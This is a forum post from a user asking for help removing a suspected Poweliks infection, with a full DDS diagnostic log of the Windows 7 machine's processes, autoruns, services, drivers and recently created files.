
Looks like you may have the Poweliks infection


  • This topic is locked
10 replies to this topic

#1 jmantowin

  • Members

Posted 31 October 2014 - 02:13 PM

I was told to post here after running a few diagnostics to identify a malware/bot on my machine.

I need help removing it, please.

This is the URL for that topic.

http://www.bleepingcomputer.com/forums/t/553375/multiple-instances-of-com-surrogatedllhostexe-32/

Will be glad to supply any additional info beyond what is there.

THANKS!

Jman

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 10.71.2
Run by JoseAlcazar at 15:05:43 on 2014-10-31
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12249.8061 [GMT -4:00]
.
AV: Norton Security Suite *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Security Suite *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Security Suite *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
c:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe
C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\sftservice.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe
C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AthBtTray.exe
C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Winamp\winampa.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\TOASTER.EXE
C:\Program Files (x86)\Dell DataSafe Local Backup\Components\DSUpdate\DSUpd.exe
C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\My Dell\uaclauncher.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.yahoo.com/
mWinlogon: Userinit = userinit.exe,
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\ips\ipsbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: SmartSelect Class: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Adobe PDF: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coieplg.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
uRun: [DellSystemDetect] C:\Users\JoseAlcazar\AppData\Local\Apps\2.0\T64K68GD.AMZ\O6XZMXTD.PV6\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [ShwiconXP9106] C:\Program Files (x86)\Multimedia Card Reader(9106)\ShwiconXP9106.exe
mRun: [Dell DataSafe Online] C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuClient.exe
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [AdobeCS4ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
mRun: [Adobe Acrobat Speed Launcher] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
mRun: [Adobe_ID0ENQBO] C:\PROGRA~2\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
mRun: [WinampAgent] "C:\Program Files (x86)\Winamp\winampa.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert link target to existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {7815BE26-237D-41A8-A98F-F7BD75F71086} - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://qtinstall.apple.com/qtactivex/qtplugin.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{4D57ED45-85E6-4BFE-842C-1145A7FAE3DC} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{5AEF1F42-0024-46E6-A692-C4CC74DF0891} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coieplg.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coieplg.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} -
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
x64-Run: [Nvtmru] "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [AtherosBtStack] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\btvstack.exe"
x64-Run: [AthBtTray] "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\athbttray.exe"
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2012-9-26 16152]
R0 nvpciflt;nvpciflt;C:\Windows\System32\drivers\nvpciflt.sys [2014-8-19 32544]
R0 SymDS;Symantec Data Store;C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys [2014-10-16 493656]
R0 SymEFA;Symantec Extended File Attributes;C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys [2014-10-16 1148120]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [2014-10-27 1587416]
R1 ccSet_N360;N360 Settings Manager;C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys [2014-10-16 162392]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141030.001\IDSviA64.sys [2014-10-30 633560]
R1 SymIRON;Symantec Iron Driver;C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys [2014-10-16 266968]
R1 SymNetS;Symantec Network Security WFP Driver;C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys [2014-10-16 593112]
R2 AERTFilters;Andrea RT Filters Service;C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [2012-9-26 98208]
R2 AtherosSvc;AtherosSvc;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe [2012-12-27 204928]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2012-9-26 13592]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-1-10 627936]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-28 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-28 968504]
R2 N360;Norton Security Suite;C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe [2014-10-16 265040]
R2 NOBU;Dell DataSafe Online;C:\Program Files (x86)\Dell\Dell Datasafe Online\NOBuAgent.exe [2010-8-25 2823000]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2013-12-9 1370912]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [2013-12-9 15128352]
R2 SftService;SoftThinks Agent Service;C:\Program Files (x86)\Dell DataSafe Local Backup\SftService.exe [2012-9-26 1695040]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2014-9-12 411936]
R2 UNS;Intel® Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2012-9-26 363800]
R2 ZAtheros Bt and Wlan Coex Agent;ZAtheros Bt and Wlan Coex Agent;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [2012-12-27 327296]
R2 ZAtheros Wlan Agent;ZAtheros Wlan Agent;C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [2014-10-25 81536]
R3 AthBTPort;Atheros Virtual Bluetooth Class;C:\Windows\System32\drivers\btath_flt.sys [2012-12-27 36480]
R3 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE [2014-3-11 247968]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;C:\Windows\System32\drivers\btath_a2dp.sys [2012-12-27 341120]
R3 btath_avdt;Atheros Bluetooth AVDT Service;C:\Windows\System32\drivers\btath_avdt.sys [2012-12-27 111232]
R3 BTATH_BUS;Atheros Bluetooth Bus;C:\Windows\System32\drivers\btath_bus.sys [2012-12-27 30848]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;C:\Windows\System32\drivers\btath_hcrp.sys [2012-12-27 168064]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;C:\Windows\System32\drivers\btath_lwflt.sys [2012-12-27 68736]
R3 BTATH_RCP;Bluetooth AVRCP Device;C:\Windows\System32\drivers\btath_rcp.sys [2012-12-27 281728]
R3 BtFilter;BtFilter;C:\Windows\System32\drivers\btfilter.sys [2012-12-27 551552]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-9-12 142640]
R3 IntcDAud;Intel® Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2012-9-26 331264]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2012-9-26 356120]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2012-9-26 787736]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-10-28 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-10-28 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-10-28 63704]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\drivers\nvvad64v.sys [2013-12-9 39200]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-9-26 648808]
S2 BBSvc;BingBar Service;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE [2014-3-11 193696]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 DellDigitalDelivery;Dell Digital Delivery Service;C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [2012-8-2 173056]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 Adobe Version Cue CS4;Adobe Version Cue CS4;C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [2008-8-15 284016]
S3 FLEXnet Licensing Service 64;FLEXnet Licensing Service 64;C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe [2012-9-30 1038088]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-10-16 111616]
S3 mbamchameleon;mbamchameleon;C:\Windows\System32\drivers\mbamchameleon.sys [2014-10-28 93400]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-2-2 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-8-24 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2013-2-2 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-9-30 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2008-5-6 14464]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
ShellExec: dreamweaver.exe: Open="C:\Program Files (x86)\Adobe\Adobe Dreamweaver CS4\dreamweaver.exe", "%1"
.
=============== Created Last 30 ================
.
2014-10-30 20:56:28 -------- d-----w- C:\Program Files (x86)\ESET
2014-10-30 20:37:02 -------- d-----w- C:\Windows\ERUNT
2014-10-30 20:26:37 536576 ----a-w- C:\Windows\SysWow64\sqlite3.dll
2014-10-30 20:26:09 -------- d-----w- C:\AdwCleaner
2014-10-28 23:42:21 -------- d-----w- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-28 23:18:03 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-28 23:17:50 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-28 23:17:50 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-28 23:17:50 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-28 23:17:50 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-25 23:25:07 -------- d-----w- C:\ProgramData\Atheros
2014-10-25 23:20:34 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\Atheros
2014-10-25 23:20:29 -------- d-----w- C:\Program Files (x86)\Common Files\Atheros
2014-10-25 23:19:14 439296 ----a-w- C:\Windows\System32\athihvs.dll
2014-10-25 23:07:30 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\Dell
2014-10-25 23:07:17 -------- d-----w- C:\ProgramData\PC-Doctor for Windows
2014-10-25 23:07:08 -------- d-----w- C:\Program Files\My Dell
2014-10-25 23:06:40 -------- d-----w- C:\Program Files\Dell Support Center
2014-10-25 23:06:33 -------- d-----w- C:\ProgramData\PCDr
2014-10-25 23:05:39 -------- d-----w- C:\Users\JoseAlcazar\AppData\Roaming\PCDr
2014-10-25 23:03:11 -------- d-----w- C:\Users\JoseAlcazar\AppData\Local\Deployment
2014-10-25 23:03:11 -------- d-----w- C:\Users\JoseAlcazar\AppData\Local\Apps
2014-10-24 20:37:49 -------- d--h--w- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-17 22:42:33 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-10-17 22:18:29 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-16 15:37:58 -------- d-sh--w- C:\Users\JoseAlcazar\AppData\Local\EmieUserList
2014-10-16 15:37:58 -------- d-sh--w- C:\Users\JoseAlcazar\AppData\Local\EmieSiteList
2014-10-16 15:05:53 7168 ----a-w- C:\Windows\SysWow64\KBDYAK.DLL
2014-10-16 14:06:17 876248 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtsp64.sys
2014-10-16 14:06:17 593112 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys
2014-10-16 14:06:17 493656 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys
2014-10-16 14:06:17 37592 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtspx64.sys
2014-10-16 14:06:17 23568 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symelam.sys
2014-10-16 14:06:17 1148120 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys
2014-10-16 14:06:16 266968 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys
2014-10-16 14:06:16 162392 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys
2014-10-16 14:06:10 -------- d-----w- C:\Windows\System32\drivers\N360x64\1506000.020
2014-10-14 21:52:59 693176 ----a-w- C:\Windows\System32\winload.efi
.
==================== Find3M  ====================
.
2014-10-02 23:28:47 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-10-02 23:28:47 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-09-29 00:58:48 3198976 ----a-w- C:\Windows\System32\win32k.sys
2014-09-25 02:08:38 371712 ----a-w- C:\Windows\System32\qdvd.dll
2014-09-25 01:40:50 519680 ----a-w- C:\Windows\SysWow64\qdvd.dll
2014-09-18 02:00:42 3241472 ----a-w- C:\Windows\System32\msi.dll
2014-09-18 01:32:52 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
2014-09-13 01:58:18 77312 ----a-w- C:\Windows\System32\packager.dll
2014-09-13 01:40:05 67072 ----a-w- C:\Windows\SysWow64\packager.dll
2014-09-09 22:11:04 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-09-09 21:47:10 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-09-05 02:11:09 6584320 ----a-w- C:\Windows\System32\mstscax.dll
2014-09-05 01:52:41 5703168 ----a-w- C:\Windows\SysWow64\mstscax.dll
2014-09-04 05:23:20 424448 ----a-w- C:\Windows\System32\rastls.dll
